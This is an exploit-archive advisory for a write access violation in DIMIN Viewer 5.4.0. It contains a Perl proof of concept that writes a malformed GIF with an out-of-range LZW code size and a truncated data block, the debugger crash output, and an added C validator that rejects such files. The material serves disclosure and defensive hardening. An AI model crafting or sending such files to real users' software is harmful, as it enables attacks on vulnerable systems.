DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution
Posted Dec 9, 2012
Authored by Jean Pascal Pereira

DIMIN Viewer version 5.4.0 suffers from a WriteAV arbitrary code execution vulnerability.

tags | exploit, arbitrary, code execution
MD5 | 0ec28d05819ce388260faa3e453218b0

#!/usr/bin/perl

# DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution

# Author: Jean Pascal Pereira <pereira@secbiz.de>

# Vendor URI: http://www.dimin.net

# Vendor Description:

# View images in countless formats, and apply a variety of effects with this small, fast, and powerful
# application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool
# and Big Image Navigator. It also features multi language interface to feel yourself at home!

# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path. *
# * Use .symfix to have the debugger choose a symbol path. *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 006bb000 image00400000
# ModLoad: 7c900000 7c9b2000 ntdll.dll
# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll
# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll
# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
# ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll
# ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv
# (fdc.b98): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
# ModLoad: 00e50000 00ef7000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll
# ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 00f20000 0102f000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# ModLoad: 01050000 0106a000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll
# ModLoad: 01090000 010ba000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll
# (fdc.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll -
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=????????????????????????????????
# 0:000> r;!exploitable -v;q
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=????????????????????????????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# Exception Faulting Address: 0x1471000
# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation
#
# Exception Hash (Major/Minor): 0x550b2f71.0x55423571
#
# Stack Trace:
# div5_xtd_formats!divGetFilter+0x80c8b
# div5_xtd_formats!divGetFilter+0x80d0a
# div5_xtd_formats+0xc821
# div5_xtd_formats+0xcc07
# Instruction Address: 0x0000000000fb1a7b
#

# Proof of Concept:

# The file is a GIF89a header with a 16-entry global colour table, followed by a graphic
# control extension and an image descriptor whose LZW minimum code size byte is 0xFE
# (the format allows 2..8) and whose image data is cut off after one byte.
my $crafted = "\x47\x49\x46\x38\x39\x61\x30\x00\x2C\x00\xB3\x00\x00\x00\x00\x00". # "GIF89a", 48x44 screen, flags 0xB3, palette begins
"\x80\x00\x00\x00\x80\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00".
"\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00\x00\x00\xFF\x00\xFF\xFF".
"\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9\x04". # palette ends; graphic control extension
"\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x30\x00\x2C\x00\x00\xFE". # image descriptor 48x44 at (0,0), LZW minimum code size 0xFE
"\x04\xF0"; # 4-byte data sub-block declared, only one byte present

open(C, ">:raw", "crafted.gif") or die "crafted.gif: $!";
print C $crafted;
close(C);

# http://0xffe4.org
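The debugger output above records a Write Access Violation at 0x01471000, a page boundary, from a 16-byte movdqa store inside div5_xtd_formats.dll while the viewer parses the 82-byte file the PoC writes. The two fields in that file that fall outside what the GIF format allows are the LZW minimum code size (0xFE, where 2..8 is valid) and the image data, which ends after one byte of a declared 4-byte sub-block; the advisory does not say which of them the vendor decoder mishandles. The following is an added example, not part of the advisory and not the vendor's code: a bounds-checked structural validator in C that walks the GIF header, extensions and image descriptors through a cursor that refuses to read past the buffer, and rejects a file on the first out-of-range field rather than sizing decoder state from it. CRAFTED_GIF is the byte string from the PoC; MINIMAL_GIF, the error names and the helper validate_crafted_with_lzw_min are constructed for the example.

```c
/* Added example, not part of the advisory or the vendor's code: a bounds-checked
 * structural validator for the GIF fields the crafted file above exercises. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

enum gif_status {
    GIF_OK = 0,
    GIF_ERR_TRUNCATED,             /* a field or sub-block runs past the end of the buffer */
    GIF_ERR_SIGNATURE,
    GIF_ERR_BAD_LZW_MIN_CODE_SIZE, /* outside the 2..8 range the GIF89a format allows */
    GIF_ERR_IMAGE_OUT_OF_SCREEN,   /* image rectangle exceeds the logical screen */
    GIF_ERR_UNKNOWN_BLOCK
};

/* Cursor that refuses to read past the end of the buffer. */
struct reader { const uint8_t *p; size_t len; size_t pos; };

static int rd_u8(struct reader *r, uint8_t *out) {
    if (r->pos >= r->len) return 0;
    *out = r->p[r->pos++];
    return 1;
}
static int rd_u16le(struct reader *r, uint16_t *out) {
    uint8_t lo, hi;
    if (!rd_u8(r, &lo) || !rd_u8(r, &hi)) return 0;
    *out = (uint16_t)(lo | (hi << 8));
    return 1;
}
static int rd_skip(struct reader *r, size_t n) {
    if (n > r->len - r->pos) return 0;
    r->pos += n;
    return 1;
}
/* Colour table length from a packed flags byte: 3 bytes * 2^(size+1) entries. */
static size_t color_table_bytes(uint8_t packed) { return 3u * (1u << ((packed & 7u) + 1u)); }

/* Walk a chain of data sub-blocks (length byte, then that many bytes) up to the 0 terminator. */
static int skip_subblocks(struct reader *r) {
    uint8_t n;
    do {
        if (!rd_u8(r, &n) || !rd_skip(r, n)) return 0;
    } while (n != 0);
    return 1;
}

enum gif_status gif_validate(const uint8_t *buf, size_t len) {
    struct reader r = { buf, len, 0 };
    uint16_t sw, sh, left, top, w, h;
    uint8_t packed, b, lzw_min;

    if (len < 6 || (memcmp(buf, "GIF87a", 6) != 0 && memcmp(buf, "GIF89a", 6) != 0))
        return GIF_ERR_SIGNATURE;
    r.pos = 6;
    /* Logical screen descriptor: width, height, packed flags, background index, aspect ratio. */
    if (!rd_u16le(&r, &sw) || !rd_u16le(&r, &sh) || !rd_u8(&r, &packed) || !rd_skip(&r, 2))
        return GIF_ERR_TRUNCATED;
    if ((packed & 0x80) && !rd_skip(&r, color_table_bytes(packed)))
        return GIF_ERR_TRUNCATED;

    for (;;) {
        if (!rd_u8(&r, &b)) return GIF_ERR_TRUNCATED;   /* no trailer: file cut short */
        if (b == 0x3B) return GIF_OK;                    /* trailer */
        if (b == 0x21) {                                 /* extension: label, then sub-blocks */
            if (!rd_u8(&r, &b) || !skip_subblocks(&r)) return GIF_ERR_TRUNCATED;
            continue;
        }
        if (b != 0x2C) return GIF_ERR_UNKNOWN_BLOCK;
        /* Image descriptor: left, top, width, height, packed flags. */
        if (!rd_u16le(&r, &left) || !rd_u16le(&r, &top) || !rd_u16le(&r, &w) ||
            !rd_u16le(&r, &h) || !rd_u8(&r, &packed))
            return GIF_ERR_TRUNCATED;
        if ((uint32_t)left + w > sw || (uint32_t)top + h > sh)
            return GIF_ERR_IMAGE_OUT_OF_SCREEN;
        if ((packed & 0x80) && !rd_skip(&r, color_table_bytes(packed)))
            return GIF_ERR_TRUNCATED;
        if (!rd_u8(&r, &lzw_min)) return GIF_ERR_TRUNCATED;
        /* A decoder that sizes its code table or shift width from this byte must
         * reject values above 8 before allocating or writing anything. */
        if (lzw_min < 2 || lzw_min > 8) return GIF_ERR_BAD_LZW_MIN_CODE_SIZE;
        if (!skip_subblocks(&r)) return GIF_ERR_TRUNCATED;
    }
}

/* Sample inputs. CRAFTED_GIF is the 82-byte string from the PoC above; MINIMAL_GIF is a
 * constructed, well-formed 1x1 image for comparison. */
static const uint8_t CRAFTED_GIF[] = {
    0x47,0x49,0x46,0x38,0x39,0x61,0x30,0x00,0x2C,0x00,0xB3,0x00,0x00,0x00,0x00,0x00,
    0x80,0x00,0x00,0x00,0x80,0x00,0x80,0x80,0x00,0x00,0x00,0x80,0x80,0x00,0x80,0x00,
    0x80,0x80,0x80,0x80,0x80,0xC0,0xC0,0xC0,0xFF,0x00,0x00,0x00,0xFF,0x00,0xFF,0xFF,
    0x00,0x00,0x00,0xFF,0xFF,0x00,0xFF,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0x21,0xF9,0x04,
    0x01,0x00,0x00,0x0F,0x00,0x2C,0x00,0x00,0x00,0x00,0x30,0x00,0x2C,0x00,0x00,0xFE,
    0x04,0xF0 };
static const uint8_t MINIMAL_GIF[] = {
    'G','I','F','8','9','a', 0x01,0x00, 0x01,0x00, 0x80, 0x00, 0x00, /* header, 2-entry table */
    0x00,0x00,0x00, 0xFF,0xFF,0xFF,                                  /* palette */
    0x2C, 0x00,0x00, 0x00,0x00, 0x01,0x00, 0x01,0x00, 0x00,           /* image descriptor 1x1 */
    0x02, 0x02,0x44,0x01, 0x00, 0x3B };                               /* lzw=2, data, trailer */

/* Re-check the crafted sample with its LZW minimum code size (offset 79) replaced,
 * to see which check fires next. */
enum gif_status validate_crafted_with_lzw_min(uint8_t lzw_min) {
    uint8_t copy[sizeof CRAFTED_GIF];
    memcpy(copy, CRAFTED_GIF, sizeof copy);
    copy[79] = lzw_min;
    return gif_validate(copy, sizeof copy);
}

int main(void) {
    static const char *names[] = { "ok", "truncated", "bad signature",
        "bad LZW minimum code size", "image outside logical screen", "unknown block" };
    printf("minimal sample: %s\n", names[gif_validate(MINIMAL_GIF, sizeof MINIMAL_GIF)]);
    printf("crafted sample: %s\n", names[gif_validate(CRAFTED_GIF, sizeof CRAFTED_GIF)]);
    printf("crafted, lzw=8: %s\n", names[validate_crafted_with_lzw_min(8)]);
    return 0;
}
```

Run stand-alone, the program reports the minimal sample as ok, the crafted sample as rejected for its LZW minimum code size, and the same file with that byte set to 8 as truncated, since the declared 4-byte sub-block has only one byte behind it. The design point is the reader cursor: every multi-byte field and every table or sub-block length is checked against the remaining buffer before it is consumed, so a file that lies about its own sizes fails a comparison instead of driving a store past the end of an allocation. A validator of this kind cannot prove a file safe for a given decoder; it enforces the format's constraints so that a decoder never sees values the format does not permit.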
